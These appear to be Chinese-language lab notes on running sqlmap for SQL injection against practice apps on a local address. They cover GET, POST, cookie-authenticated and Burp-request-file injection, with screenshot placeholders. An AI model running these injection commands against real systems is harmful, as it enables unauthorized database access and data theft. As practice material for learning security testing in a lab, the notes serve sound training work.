GET注入

和平时一样
python sqlmap.py -u “http://192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” -v 2
image.png

POST注入

和GET有一点不一样
image.pngimage.png
python sqlmap.py -u “http://192.168.0.106/06/vul/sqli/sqli_id.php” —data=”id=1&submit=%E6%9F%A5%E8%AF%A2”image.png

登陆后注入

python sqlmap.py -u “http://192.168.0.106/01/vulnerabilities/sqli/?id=1&Submit=Submit#” —cookie=”security=low; PHPSESSID=8ttjl2julohe56te0tnr2tcc76”
注意:一定要加上cookie字段,不然他会302跳到不知道什么地方去
image.png

python sqlmap.py -u “http://192.168.0.106/01/vulnerabilities/sqli/?id=1&Submit=Submit#” —cookie=”security=low; PHPSESSID=8ttjl2julohe56te0tnr2tcc76” —level 3
加上这个会去检测是否存在cookie注入

也可以用包来注入

python sqlmap.py -r xxx.txt
python sqlmap.py -l xxx.txt
这俩都是把burp截下来的数据包放入文件中,再进行注入
image.png
python sqlmap.py -m xxx.text
这个是可以好多网址一起检测
image.png